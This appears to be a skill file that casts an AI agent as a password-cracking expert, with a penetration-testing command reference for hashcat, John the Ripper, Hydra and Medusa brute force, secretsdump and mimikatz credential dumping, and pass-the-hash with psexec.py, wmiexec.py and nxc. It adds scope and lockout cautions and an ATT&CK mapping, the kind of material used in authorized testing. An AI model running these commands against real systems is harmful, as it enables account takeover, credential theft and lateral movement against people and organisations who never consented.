Skill v1.0.0
currentAutomated scan100/100version: "1.0.0" name: cracking-passwords description: Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks. verified: 2026-07-27
Password Attacks and Credential Cracking Skill
You are a password cracking and credential attack expert. Use this skill when the user requests help with:
- Password hash cracking (hashcat, john)
- Hash identification and extraction
- Credential spraying and brute forcing
- Rainbow table attacks
- Pass-the-hash techniques
- Wordlist generation
- Rule-based attacks
When to Use
Activate this skill when the user asks to:
- Crack password hashes
- Identify unknown hash types
- Perform password spraying
- Generate wordlists
- Optimize hashcat/john performance
- Extract and crack credentials
- Perform pass-the-hash attacks
- Help with credential-based attacks
Scope and authorization. Cracking is only as authorized as the hashes were. Confirm the material came from a system in scope, and treat recovered plaintext as live credentials — encrypt at rest, never paste into a shared doc or a third-party cracking service, and destroy it at engagement end per the contracted retention terms.
Three domain-specific traps:
- Spraying is an availability risk, not just an access one. Online
attempts against production auth can lock out real accounts and page a real SOC. You need the lockout threshold and observation window in writing, an agreed attempt rate, and a named contact — or you cause an outage and a false incident.
- Breach-corpus material is not fair game by default. Third-party dump
data belongs to people who are not your client. Using it to seed wordlists or validate reuse against live accounts needs explicit engagement coverage and a lawful basis under GDPR-style regimes.
- Pass-the-hash is authentication, not analysis. Replaying a hash is
unauthorized access unless lateral movement is explicitly in scope.
Report the fact of a weak credential and its policy implication; there is rarely a reason to put recovered plaintext in a deliverable.
When NOT to Use
- Online brute force against a live service — that is testing, not cracking;
use testing-web-applications or enumerating-network-services, and mind lockouts
- Obtaining the hashes in the first place — use the relevant privilege
escalation or attacking-active-directory skill
- Reviewing how an application stores passwords — use
reviewing-cryptography
Core Methodologies
1. Hash Identification
Identify Hash Type:
# hashidhashid 'hash_here'hashid -m 'hash_here' # Show hashcat mode# hash-identifierhash-identifier# haitihaiti 'hash_here'# Manual identification by format# MD5: 32 hex chars# SHA1: 40 hex chars# SHA256: 64 hex chars# NTLM: 32 hex chars (same as MD5 but context differs)# bcrypt: $2a$, $2b$, $2y$ prefix
Common Hash Formats:
MD5: 5f4dcc3b5aa765d61d8327deb882cf99SHA1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8SHA256: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8NTLM: 209c6174da490caeb422f3fa5a7ae634NTLMv2: username::domain:challenge:response:responsebcrypt: $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWyLinux SHA512: $6$rounds=5000$...
2. Hashcat Basics
Installation:
# Kali Linuxapt install hashcat# Check GPUshashcat -I
Basic Hashcat Usage:
# Dictionary attackhashcat -m <hash_type> -a 0 hashes.txt wordlist.txt# Dictionary + ruleshashcat -m <hash_type> -a 0 hashes.txt wordlist.txt -r rules/best64.rule# Brute forcehashcat -m <hash_type> -a 3 hashes.txt ?a?a?a?a?a?a?a?a# Combination attackhashcat -m <hash_type> -a 1 hashes.txt wordlist1.txt wordlist2.txt# Show cracked passwordshashcat -m <hash_type> hashes.txt --show# Resume sessionhashcat -m <hash_type> hashes.txt wordlist.txt --session mysessionhashcat --session mysession --restore
Common Hash Types (-m flag):
0 = MD5100 = SHA11400 = SHA2561700 = SHA5121000 = NTLM5600 = NetNTLMv23200 = bcrypt1800 = sha512crypt (Linux)7500 = Kerberos 5 etype 23 AS-REQ Pre-Auth (sniffed pre-auth, not roasting)13100 = Kerberos 5 etype 23 TGS-REP (Kerberoasting, krb5tgs)18200 = Kerberos 5 etype 23 AS-REP (ASREPRoasting, krb5asrep)16800 = WPA-PMKID-PBKDF222000 = WPA-PBKDF2-PMKID+EAPOL
Hashcat Attack Modes:
-a 0 # Dictionary attack-a 1 # Combination attack-a 3 # Brute-force attack-a 6 # Hybrid wordlist + mask-a 7 # Hybrid mask + wordlist
Hashcat Masks:
?l = lowercase letters (a-z)?u = uppercase letters (A-Z)?d = digits (0-9)?s = special characters?a = all characters (?l?u?d?s)?b = binary (0x00 - 0xff)# Examples?u?l?l?l?l?d?d # Password01?d?d?d?d # 4-digit PIN?a?a?a?a?a?a # 6 characters (any)
3. John the Ripper
Basic John Usage:
# Auto-detect and crackjohn hashes.txt# Specify formatjohn --format=NT hashes.txtjohn --format=Raw-SHA256 hashes.txt# With wordlistjohn --wordlist=rockyou.txt hashes.txt# With rulesjohn --wordlist=wordlist.txt --rules hashes.txt# Show cracked passwordsjohn --show hashes.txtjohn --show --format=NT hashes.txt# List formatsjohn --list=formats
Common John Formats:
Raw-MD5Raw-SHA1Raw-SHA256NT (NTLM)LMbcryptsha512cryptkrb5asrepkrb5tgs
Unshadow (Linux):
# Combine passwd and shadow filesunshadow passwd shadow > unshadowed.txtjohn unshadowed.txt
4. Specific Hash Type Attacks
NTLM Hashes:
# Hashcathashcat -m 1000 -a 0 ntlm.txt rockyou.txt -r rules/best64.rule# Johnjohn --format=NT --wordlist=rockyou.txt ntlm.txt
NTLMv2 (NetNTLMv2):
# Hashcathashcat -m 5600 ntlmv2.txt rockyou.txt# Captured from Responderhashcat -m 5600 Responder-Session.txt rockyou.txt
Kerberoast (TGS-REP):
# Hashcat (RC4)hashcat -m 13100 tgs.txt rockyou.txt --force# Johnjohn --format=krb5tgs --wordlist=rockyou.txt tgs.txt
ASREPRoast:
# Hashcathashcat -m 18200 asrep.txt rockyou.txt# Johnjohn --format=krb5asrep asrep.txt
bcrypt:
# Hashcat (slow!)hashcat -m 3200 bcrypt.txt wordlist.txt# Johnjohn --format=bcrypt bcrypt.txt
Linux SHA512 ($6$):
# Hashcathashcat -m 1800 shadow.txt rockyou.txt# Johnjohn --format=sha512crypt shadow.txt
WPA/WPA2:
# Convert pcap to hashcat formathcxpcapngtool -o hash.hc22000 capture.pcap# Crack PMKIDhashcat -m 22000 hash.hc22000 wordlist.txt# Or convert with aircrack toolsaircrack-ng -J output capture.caphccap2john output.hccap > hash.johnjohn hash.john
5. Wordlist Generation and Credential Spraying
Wordlist generation (CeWL, crunch, John rules, maskprocessor, CUPP) and credential spraying (SMB, Kerberos, RDP) command references live in references/wordlist-generation-and-spraying.md.
6. Online Brute Force
Hydra:
# HTTP POST loginhydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"# SSHhydra -l root -P passwords.txt ssh://10.10.10.10# FTPhydra -l admin -P passwords.txt ftp://10.10.10.10# SMBhydra -L users.txt -P passwords.txt smb://10.10.10.10# RDPhydra -L users.txt -P passwords.txt rdp://10.10.10.10
Medusa:
# SSHmedusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh# SMBmedusa -h 10.10.10.10 -U users.txt -P passwords.txt -M smbnt
8. Pass-the-Hash
Extract NTLM Hashes:
# secretsdump (from SAM)secretsdump.py -sam sam.hive -system system.hive LOCAL# secretsdump (from DC)secretsdump.py domain/user:password@10.10.10.10# mimikatzsekurlsa::logonpasswordslsadump::sam
Use NTLM Hash:
# pth-winexepth-winexe -U domain/user%hash //10.10.10.10 cmd# NetExec (nxc, formerly CrackMapExec)nxc smb 10.10.10.10 -u administrator -H 'hash' -x whoami# psexec.pypsexec.py -hashes :hash administrator@10.10.10.10# wmiexec.pywmiexec.py -hashes :hash administrator@10.10.10.10
Useful Wordlists
Common Locations:
# Kali Linux/usr/share/wordlists/rockyou.txt/usr/share/seclists/Passwords/# Download rockyougunzip /usr/share/wordlists/rockyou.txt.gz
SecLists:
# Downloadgit clone https://github.com/danielmiessler/SecLists.git# Common passwordsSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txtSecLists/Passwords/Common-Credentials/10k-most-common.txt
Custom Wordlists:
# Generate targeted wordlist# Combine company name, years, common patterns# Example: CompanyName2024!, CompanyName@2024, etc.
Performance Optimization
Hashcat Optimizations:
# Use GPUhashcat -m 1000 hashes.txt wordlist.txt -d 1# Increase workloadhashcat -m 1000 hashes.txt wordlist.txt -w 3 # 1-4, higher = faster# Show statushashcat -m 1000 hashes.txt wordlist.txt --status --status-timer=10# Benchmarkhashcat -b# Use rules efficientlyhashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule --loopback
Troubleshooting
Hashcat Not Using GPU:
# Check GPU driversnvidia-smi # NVIDIArocm-smi # AMD# Force specific devicehashcat -d 1 ...
Hash Format Issues:
# Remove username prefixcut -d: -f2 hashes.txt > clean_hashes.txt# Ensure proper format (user:hash)cat hashes.txt | awk -F: '{print $1":"$4}'
Slow Cracking:
# Try smaller wordlist first# Use targeted rules# Consider cloud GPU instances# Use mask attack for known patterns
References
- Wordlist generation and credential spraying — extracted command reference
- Hashcat Wiki: https://hashcat.net/wiki/
- John the Ripper: https://www.openwall.com/john/
- SecLists: https://github.com/danielmiessler/SecLists
- HackTricks Password Attacks: https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force
<!-- attack:start -->
ATT&CK Coverage
_Generated from secskills-core/ttp-index.json — edit that file, then run python3 scripts/sync_attack.py --write. Re-verify IDs against the current ATT&CK release before citing them in a report._
Initial Access (TA0001)
- T1078 Valid Accounts _(also Persistence, Privilege Escalation, Defense Evasion)_ — see also
attacking-active-directory,exploiting-cloud-platforms
Credential Access (TA0006)
- T1003 OS Credential Dumping — see also
attacking-active-directory - T1003.002 Security Account Manager — see also
escalating-windows-privileges - T1003.008 /etc/passwd and /etc/shadow — see also
escalating-linux-privileges - T1110 Brute Force
- T1110.002 Password Cracking
- T1110.003 Password Spraying — see also
attacking-active-directory - T1558.003 Kerberoasting — see also
attacking-active-directory
Lateral Movement (TA0008)
- T1550.002 Pass the Hash — see also
attacking-active-directory
Detection content for any of these: engineering-detections. Proactive search: hunting-threats. Post-compromise: responding-to-incidents.
<!-- attack:end -->